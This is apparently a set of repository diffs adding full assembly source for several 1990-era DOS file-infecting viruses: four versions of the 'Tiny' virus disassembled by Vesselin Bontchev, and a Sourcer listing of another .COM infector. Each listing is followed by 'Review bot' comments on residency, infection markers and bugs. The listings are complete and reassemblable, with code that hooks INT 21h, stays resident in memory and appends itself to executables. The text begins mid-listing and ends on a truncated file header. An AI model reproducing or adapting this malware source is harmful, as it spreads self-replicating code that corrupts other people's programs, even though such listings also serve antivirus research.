||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
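--- a/TINY159.ASM
+++ b/TINY159.ASM
@@ -0,0 +1,178 @@
+page ,132
+name TINY159
+title The 'Tiny' virus, version TINY-159
+.radix 16
+
+; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
+; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
+; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
+; º º
+; º The 'Tiny' Virus, version TINY-159 º
+; º Disassembled by Vesselin Bontchev, July 1990 º
+; º º
+; º Copyright (c) Vesselin Bontchev 1989, 1990 º
+; º º
+; º This listing is only to be made available to virus researchers º
+; º or software writers on a need-to-know basis. º
+; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+assume cs:code, ds:code
+
+org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+jmp v_entry ; Jump to virus code
+db 'M' ; Virus signature
+mov ax,4C00 ; Program terminate
+int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+mov si,0FF ; Determine the start addres of the virus body
+add si,[si+2]
+
+mov di,offset start ; Put the addres of program start on the stack
+push di ; Now a Near RET instruction will jump there
+
+push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+movsw ; Restore the original first 4 bytes
+movsw
+
+mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+xor cx,cx ; ES := 0
+mov es,cx
+mov cl,v_len-2 ; CX := virus length
+lodsw ; Check if virus is present in memory
+scasw
+je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+dec di ; Adjust DI
+dec di
+stosw ; Store the first word of the virus body
+rep movsb ; Store the rest of the virus
+
+mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+xchg ax,word ptr es:[di-(32-21)*4]
+stosw
+xchg ax,cx
+test ax,ax
+jz vect_cpy ; Loop until done
+
+run:
+pop ax ; Restore AX
+push ds ; ES := DS
+pop es
+
+; Jump to program start via funny RET instruction:
+
+ret
+
+int_21: ; New INT 21h handler
+cmp ax,4B00 ; EXEC function call?
+jne end_21 ; Exit if not
+
+push ax ; Save registers used
+push bx
+push cx
+push dx
+push di
+push ds
+push es
+
+push cs ; ES := CS
+pop es
+
+mov ax,3D02 ; Open the file for both reading and writting
+int 32
+jc end_exec ; Exit on error
+xchg bx,ax ; Save the file handle in BX
+
+mov ah,3F ; Read the first 4 bytes of the file
+mov cx,4 ; 4 bytes to read
+mov dx,seg_60 ; Put them in first4
+mov di,dx ; Save first4 address in DI
+push cs ; DS := CS
+pop ds
+int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+push di ; Save DI
+mov al,'M' ; Look for `M'
+repne scasb
+pop di ; Restore DI
+je close ; Exit if file not suitable for infection
+
+mov ax,4202 ; Seek to the end of file
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+push ax ; Save file length
+
+mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+mov cl,v_len ; Length of virus body
+mov ah,40 ; Append virus to file
+int 32 ; Do it
+
+mov ax,4200 ; Seek to the file beginning
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+mov dx,di ; Point DX at first4
+mov al,0E9 ; Near JMP opcode
+stosb ; Form the first instruction of the file
+pop ax ; Restore file length in AX
+inc ax
+stosw ; Form the JMP's opperand
+mov al,'M' ; Add a `M' character to mark the file
+stosb ; as infected
+
+mov cl,4 ; Overwrite the first 4 bytes of the file
+mov ah,40
+int 32 ; Do it
+
+close:
+mov ah,3E ; Close the file
+int 32
+
+end_exec:
+pop es ; Restore used registers
+pop ds
+pop di
+pop dx
+pop cx
+pop bx
+pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+end start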
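Review bot: The file header never states the memory footprint and vector changes a memory scanner or IVT check would key on, although the code fixes them precisely: `rep movsb` after `mov di,seg_60+4` copies the body to 0000:0604h with no DOS memory allocation call anywhere in the listing, and `vect_cpy` leaves INT 21h pointing at int_21 in segment 0000h while the original INT 21h vector is parked in INT 32h, which `end_21` then uses as its exit path. I would add under the MASM note: `; Resident image: first4 at 0000:0600h, body at 0000:0604h (v_len bytes, no memory allocated); INT 21h -> 0000:int_21, original INT 21h vector saved in INT 32h.` The residency test is a single-word compare (`lodsw`/`scasw`) of the body's first word against 0000:0604h, so the comment should also say that any other resident code with the same first word at that address suppresses installation. What DOS itself keeps at 0000:0600h and above on a given version is not visible here and is worth recording as an open question for the analyst, since the install path overwrites it.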
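--- a/TINY160.ASM
+++ b/TINY160.ASM
@@ -0,0 +1,178 @@
+page ,132
+name TINY160
+title The 'Tiny' virus, version TINY-160
+.radix 16
+
+; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
+; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
+; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
+; º º
+; º The 'Tiny' Virus, version TINY-160 º
+; º Disassembled by Vesselin Bontchev, July 1990 º
+; º º
+; º Copyright (c) Vesselin Bontchev 1989, 1990 º
+; º º
+; º This listing is only to be made available to virus researchers º
+; º or software writers on a need-to-know basis. º
+; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+assume cs:code, ds:code
+
+org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+jmp v_entry ; Jump to virus code
+db 'M' ; Virus signature
+mov ax,4C00 ; Program terminate
+int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+mov si,0FF ; Determine the start addres of the virus body
+add si,[si+2]
+
+mov di,offset start ; Put the addres of program start on the stack
+push di ; Now a Near RET instruction will jump there
+
+push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+movsw ; Restore the original first 4 bytes
+movsw
+
+mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+xor cx,cx ; ES := 0
+mov es,cx
+mov cl,v_len-2 ; CX := virus length
+lodsw ; Check if virus is present in memory
+scasw
+je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+dec di ; Adjust DI
+dec di
+stosw ; Store the first word of the virus body
+rep movsb ; Store the rest of the virus
+
+mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+mov cl,2 ; The vector is 2 words long
+mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+xchg ax,word ptr es:[di-(32-21)*4]
+stosw
+mov ax,es ; Segment
+loop vect_cpy ; Loop until done
+
+run:
+pop ax ; Restore AX
+push ds ; ES := DS
+pop es
+
+; Jump to program start via funny RET instruction:
+
+ret
+
+int_21: ; New INT 21h handler
+cmp ax,4B00 ; EXEC function call?
+jne end_21 ; Exit if not
+
+push ax ; Save registers used
+push bx
+push cx
+push dx
+push di
+push ds
+push es
+
+push cs ; ES := CS
+pop es
+
+mov ax,3D02 ; Open the file for both reading and writting
+int 32
+jc end_exec ; Exit on error
+xchg bx,ax ; Save the file handle in BX
+
+mov ah,3F ; Read the first 4 bytes of the file
+mov cx,4 ; 4 bytes to read
+mov dx,seg_60 ; Put them in first4
+mov di,dx ; Save first4 address in DI
+push cs ; DS := CS
+pop ds
+int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+push di ; Save DI
+mov al,'M' ; Look for `M'
+repne scasb
+pop di ; Restore DI
+je close ; Exit if file not suitable for infection
+
+mov ax,4202 ; Seek to the end of file
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+push ax ; Save file length
+
+mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+mov cl,v_len ; Length of virus body
+mov ah,40 ; Append virus to file
+int 32 ; Do it
+
+mov ax,4200 ; Seek to the file beginning
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+mov dx,di ; Point DX at first4
+mov al,0E9 ; Near JMP opcode
+stosb ; Form the first instruction of the file
+pop ax ; Restore file length in AX
+inc ax
+stosw ; Form the JMP's opperand
+mov al,'M' ; Add a `M' character to mark the file
+stosb ; as infected
+
+mov cl,4 ; Overwrite the first 4 bytes of the file
+mov ah,40
+int 32 ; Do it
+
+close:
+mov ah,3E ; Close the file
+int 32
+
+end_exec:
+pop es ; Restore used registers
+pop ds
+pop di
+pop dx
+pop cx
+pop bx
+pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+end start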
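Review bot: The infection test scans all four buffered bytes for `M` (`mov al,'M'` / `repne scasb`, with CX still 4 from the read request assuming the read leaves CX untouched), but the comment above it claims only bytes 0, 1 and 3 carry meaning; byte 2 is scanned as well, so a host whose second JMP-operand byte happens to be 4Dh is never infected, and the byte count the read returns in AX is never examined, so for a target shorter than four bytes the scan sees whatever the previous target left in first4. I would extend the comment: `; NOTE: all 4 bytes are scanned and the read's AX is ignored - a 4Dh anywhere in bytes 0-3 (including a JMP operand) or a short file skips infection.` This matters to anyone reproducing infection rates from the listing, since the check is coarser than the comment describes. The `cmp ax,4B00` filter also means only programs started through EXEC are ever opened, which the header could state outright.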
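--- a/S.ASM
+++ b/S.ASM
@@ -0,0 +1,126 @@
+
+PAGE 59,132
+
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+;ÛÛ ÛÛ
+;ÛÛ S ÛÛ
+;ÛÛ ÛÛ
+;ÛÛ Created: 4-Aug-90 ÛÛ
+;ÛÛ Version: ÛÛ
+;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
+;ÛÛ ÛÛ
+;ÛÛ ÛÛ
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+
+data_2e equ 1ABh ; (946E:01AB=0)
+
+seg_a segment byte public
+assume cs:seg_a, ds:seg_a
+
+
+org 100h
+
+s proc far
+
+start:
+jmp loc_1 ; (0108)
+db 0CDh, 20h, 7, 8, 9
+loc_1:
+call sub_1 ; (010B)
+
+s endp
+
+;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
+; SUBROUTINE
+;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
+
+sub_1 proc near
+pop si
+sub si,10Bh
+mov bp,data_1[si] ; (946E:01A0=0)
+add bp,103h
+lea dx,[si+1A2h] ; Load effective addr
+xor cx,cx ; Zero register
+mov ah,4Eh ; 'N'
+loc_2:
+int 21h ; DOS Services ah=function 4Eh
+; find 1st filenam match @ds:dx
+jc loc_6 ; Jump if carry Set
+mov dx,9Eh
+mov ax,3D02h
+int 21h ; DOS Services ah=function 3Dh
+; open file, al=mode,name@ds:dx
+mov bx,ax
+mov ah,3Fh ; '?'
+lea dx,[si+1A8h] ; Load effective addr
+mov di,dx
+mov cx,3
+int 21h ; DOS Services ah=function 3Fh
+; read file, cx=bytes, to ds:dx
+cmp byte ptr [di],0E9h
+je loc_4 ; Jump if equal
+loc_3:
+mov ah,4Fh ; 'O'
+jmp short loc_2 ; (0120)
+loc_4:
+mov dx,[di+1]
+mov data_1[si],dx ; (946E:01A0=0)
+xor cx,cx ; Zero register
+mov ax,4200h
+int 21h ; DOS Services ah=function 42h
+; move file ptr, cx,dx=offset
+mov dx,di
+mov cx,2
+mov ah,3Fh ; '?'
+int 21h ; DOS Services ah=function 3Fh
+; read file, cx=bytes, to ds:dx
+cmp word ptr [di],807h
+je loc_3 ; Jump if equal
+xor dx,dx ; Zero register
+xor cx,cx ; Zero register
+mov ax,4202h
+int 21h ; DOS Services ah=function 42h
+; move file ptr, cx,dx=offset
+cmp dx,0
+jne loc_3 ; Jump if not equal
+cmp ah,0FEh
+jae loc_3 ; Jump if above or =
+mov ds:data_2e[si],ax ; (946E:01AB=0)
+mov ah,40h ; '@'
+lea dx,[si+105h] ; Load effective addr
+mov cx,0A3h
+int 21h ; DOS Services ah=function 40h
+; write file cx=bytes, to ds:dx
+jc loc_5 ; Jump if carry Set
+mov ax,4200h
+xor cx,cx ; Zero register
+mov dx,1
+int 21h ; DOS Services ah=function 42h
+; move file ptr, cx,dx=offset
+mov ah,40h ; '@'
+lea dx,[si+1ABh] ; Load effective addr
+mov cx,2
+int 21h ; DOS Services ah=function 40h
+; write file cx=bytes, to ds:dx
+loc_5:
+mov ah,3Eh ; '>'
+int 21h ; DOS Services ah=function 3Eh
+; close file, bx=file handle
+loc_6:
+jmp bp ;*Register jump
+data_1 dw 0 ; Data table (indexed access)
+db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
+sub_1 endp
+
+
+seg_a ends
+
+
+
+end start
+
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ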
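Review bot: The open at `mov ax,3D02h` / `int 21h` is followed directly by `mov bx,ax` with no carry test, so when the open fails (a read-only target, for example) the DOS error code is used as the handle for the `3Fh` read, whose outcome is likewise unchecked before `cmp byte ptr [di],0E9h` compares whatever the buffer at [si+1A8h] still held from the previous file. The Sourcer output says nothing about this; I would add after `mov bx,ax`: `; no CF check - on open failure AX holds a DOS error code, which is then used as the handle in BX`. The listing also implicitly defines the marker a scanner needs, and a one-line comment at `loc_4` would spare a reader re-deriving it: a target must already begin with `E9`, the word at its JMP target is compared with 0807h (the `7, 8` of the `db 0CDh, 20h, 7, 8, 9` stub appended from offset 105h), and files of 0FE00h bytes or more, or whose size has a non-zero high word, are skipped (`cmp dx,0` / `cmp ah,0FEh` / `jae loc_3`).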
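--- a/TINY167.ASM
+++ b/TINY167.ASM
@@ -0,0 +1,177 @@
+page ,132
+name TINY167
+title The 'Tiny' virus, version TINY-167
+.radix 16
+
+; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
+; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
+; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
+; º º
+; º The 'Tiny' Virus, version TINY-167 º
+; º Disassembled by Vesselin Bontchev, July 1990 º
+; º º
+; º Copyright (c) Vesselin Bontchev 1989, 1990 º
+; º º
+; º This listing is only to be made available to virus researchers º
+; º or software writers on a need-to-know basis. º
+; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+assume cs:code, ds:code
+
+org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+call v_entry ; Jump to virus code
+db 'M' ; Virus signature
+mov ax,4C00 ; Program terminate
+int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+pop si ; Determine the start addres of the virus body
+add si,[si-2]
+
+; Save the original first 4 bytes of the infected file on the stack:
+
+push word ptr ds:[si-4]
+push word ptr ds:[si-2]
+
+push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+xor cx,cx ; ES := 0
+mov es,cx
+mov cl,v_len-2 ; CX := virus length
+lodsw ; Check if virus is present in memory
+scasw
+je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+dec di ; Adjust DI
+dec di
+stosw ; Store the first word of the virus body
+rep movsb ; Store the rest of the virus
+
+mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+mov cl,2 ; The vector is 2 words long
+mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+xchg ax,word ptr es:[di-(32-21)*4]
+stosw
+mov ax,es ; Segment
+loop vect_cpy ; Loop until done
+
+run:
+mov di,offset start ; Point DI at program start
+pop ax ; Restore AX
+pop word ptr ds:[di+2] ; Restore the original first 4 bytes
+pop word ptr ds:[di] ; of the file
+push ds ; ES := DS
+pop es
+jmp di ; Go
+
+int_21: ; New INT 21h handler
+cmp ax,4B00 ; EXEC function call?
+jne end_21 ; Exit if not
+
+push ax ; Save registers used
+push bx
+push cx
+push dx
+push di
+push ds
+push es
+
+push cs ; ES := CS
+pop es
+
+mov ax,3D02 ; Open the file for both reading and writting
+int 32
+jc end_exec ; Exit on error
+xchg bx,ax ; Save the file handle in BX
+
+mov ah,3F ; Read the first 4 bytes of the file
+mov cx,4 ; 4 bytes to read
+mov dx,seg_60 ; Put them in first4
+mov di,dx ; Save first4 address in DI
+push cs ; DS := CS
+pop ds
+int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+push di ; Save DI
+mov al,'M' ; Look for `M'
+repne scasb
+pop di ; Restore DI
+je close ; Exit if file not suitable for infection
+
+mov ax,4202 ; Seek to the end of file
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+push ax ; Save file length
+
+mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+mov cl,v_len ; Length of virus body
+mov ah,40 ; Append virus to file
+int 32 ; Do it
+
+mov ax,4200 ; Seek to the file beginning
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+mov dx,di ; Point DX at first4
+mov al,0E8 ; Near CALL opcode
+stosb ; Form the first instruction of the file
+pop ax ; Restore file length in AX
+inc ax
+stosw ; Form the CALL's opperand
+mov al,'M' ; Add a `M' character to mark the file
+stosb ; as infected
+
+mov cl,4 ; Overwrite the first 4 bytes of the file
+mov ah,40
+int 32 ; Do it
+
+close:
+mov ah,3E ; Close the file
+int 32
+
+end_exec:
+pop es ; Restore used registers
+pop ds
+pop di
+pop dx
+pop cx
+pop bx
+pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+end start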
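Review bot: The header block is a verbatim copy of the TINY-159/160 header and does not say what this version changes, although the code makes it clear: the host's first instruction is rewritten to `E8` (`mov al,0E8 ; Near CALL opcode`) instead of `E9`, the original first four bytes are carried on the stack (`push word ptr ds:[si-4]` / `ds:[si-2]`) and written back at `run:` rather than copied before the residency check, and the vector copy uses `mov cl,2` / `loop vect_cpy`. A scanner keyed on `E9 xx xx 4D` at offset 0 misses this variant, so I would add under the MASM note: `; TINY-167: infected host starts with CALL (E8 disp16) followed by 'M'; first 4 host bytes are restored from the stack at run:`. The `; Jump to virus code` comment on `call v_entry` should read `; Call virus code (pushes 103h, which v_entry uses to locate the body)`, since `pop si` / `add si,[si-2]` depends on that pushed return address.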
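--- a/TINY198.ASM
+++ b/TINY198.ASM
@@ -0,0 +1,199 @@
+page ,132
+name TINY198
+title The 'Tiny' virus, version TINY-198
+.radix 16
+
+; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
+; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
+; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
+; º º
+; º The 'Tiny' Virus, version TINY-198 º
+; º Disassembled by Vesselin Bontchev, July 1990 º
+; º º
+; º Copyright (c) Vesselin Bontchev 1989, 1990 º
+; º º
+; º This listing is only to be made available to virus researchers º
+; º or software writers on a need-to-know basis. º
+; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+assume cs:code, ds:code
+
+org 100
+
+seg_60 equ 600
+v_len equ v_end-v_entry
+
+start:
+jmp v_entry ; Jump to virus code
+db 'M' ; Virus signature
+mov ax,4C00 ; Program terminate
+int 21
+
+v_entry:
+call self ; Determine the start addres of the virus body
+self:
+pop si
+sub si,3
+
+push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+; Check whether the virus is already in memory and just run the program if so:
+
+mov ah,0E9
+int 21
+
+mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
+xor cx,cx ; ES := 0
+mov es,cx
+mov cl,v_len ; CX := virus length
+rep movsb ; Move the virus body there
+
+; Transfer control to cont: by PUSHing its address
+; on the stack and executing RETF:
+
+push es
+mov ax,cont-v_entry+seg_60
+push ax
+retf
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+; Resume execution from here (but already in segment 60h):
+
+cont:
+
+; Install new INT 21h handler and move the old one at INT 32h:
+
+mov di,21*4
+mov cl,2
+mov ax,int_21-v_entry+seg_60
+cld
+lp:
+push word ptr es:[di] ; Get old handler's address
+pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
+stosw ; Install the new one
+mov ax,cs
+loop lp ; Loop until done
+
+; Save the original first 4 bytes of the infected program on the stack:
+
+push word ptr cs:[first4-v_entry+seg_60]
+push word ptr cs:[first4+2-v_entry+seg_60]
+
+run_pgm:
+mov di,offset start ; Point DI at program's start
+pop word ptr [di+2] ; Restore the first 4 bytes of the program
+pop word ptr [di]
+pop ax ; Restore the original value of AX
+push ds
+push ds ; ES := DS
+pop es
+push di ; Push 100h on the stack
+retf
+
+mem_chk:
+
+; Push the original first 4 bytes of the infected program on the stack:
+
+push word ptr [si+first4-v_entry]
+push word ptr [si+first4+2-v_entry]
+jmp run_pgm ; And run the original program
+
+int_21: ; New INT 21h handler
+cmp ah,0E9 ; Memory check?
+je mem_chk ; If infected, run the original program
+cmp ax,4B00 ; EXEC function call?
+jne end_21 ; Exit if not
+
+push ax ; Save registers used
+push bx
+push cx
+push dx
+push di
+push ds
+push es
+
+push cs ; ES := CS
+pop es
+
+mov ax,3D02 ; Open the file for both reading and writting
+int 32
+jc end_exec ; Exit on error
+mov bx,ax ; Save the file handle in BX
+
+mov ah,3F ; Read the first 4 bytes of the file
+mov cx,4 ; 4 bytes to read
+mov dx,first4-v_entry+seg_60 ; Put them in first4
+mov di,dx ; Save first4 address in DI
+push cs ; DS := CS
+pop ds
+int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+push di ; Save DI
+mov al,'M' ; Look for `M'
+repne scasb
+pop di ; Restore DI
+je close ; Exit if file not suitable for infection
+
+mov ax,4202 ; Seek to the end of file
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+push ax ; Save file length
+
+mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+mov cl,v_len ; Length of virus body
+mov ah,40 ; Append virus to file
+int 32 ; Do it
+
+mov ax,4200 ; Seek to the file beginning
+xor cx,cx
+xor dx,dx
+int 32 ; Do it
+
+mov dx,di ; Point DX at first4
+mov al,0E9 ; Near JMP opcode
+stosb ; Form the first instruction of the file
+pop ax ; Restore file length in AX
+sub ax,3 ; Subtract 3 (first instruction length)
+stosw ; Form the JMP's opperand
+mov al,'M' ; Add a `M' character to mark the file
+stosb ; as infected
+
+mov cl,4 ; Overwrite the first 4 bytes of the file
+mov ah,40
+int 32 ; Do it
+
+close:
+mov ah,3E ; Close the file
+int 32
+
+end_exec:
+pop es ; Restore used registers
+pop ds
+pop di
+pop dx
+pop cx
+pop bx
+pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+end start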
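Review bot: The comment `pop ax ; Restore the original value of AX` at run_pgm holds only on the fresh-install path; on the resident path the `int 21` issued for the memory check (`mov ah,0E9`) has pushed FLAGS, CS and IP above the saved AX, mem_chk then pushes the two first4 words and jumps to run_pgm, so `pop ax` retrieves the interrupt return IP, and the host is entered through `retf` with CS, FLAGS and the original AX still on the stack and without any IRET, so the interrupt flag stays as the INT left it. The 'keep programs as DISKCOPY happy' intent of `push ax` therefore does not survive once the virus is resident. I would annotate mem_chk: `; NOTE: entered from inside INT 21h - FLAGS/CS/IP are still on the stack, so run_pgm's pop ax yields the return IP and three words are leaked to the host`. On the first-install path the AH=E9h call returns through DOS and the stack is balanced when run_pgm is reached, which the comment could say too.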
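--- a/TINYV.ASM
+++ b/TINYV.ASM
@@ -0,0 +1,102 @@
+PAGE ,132
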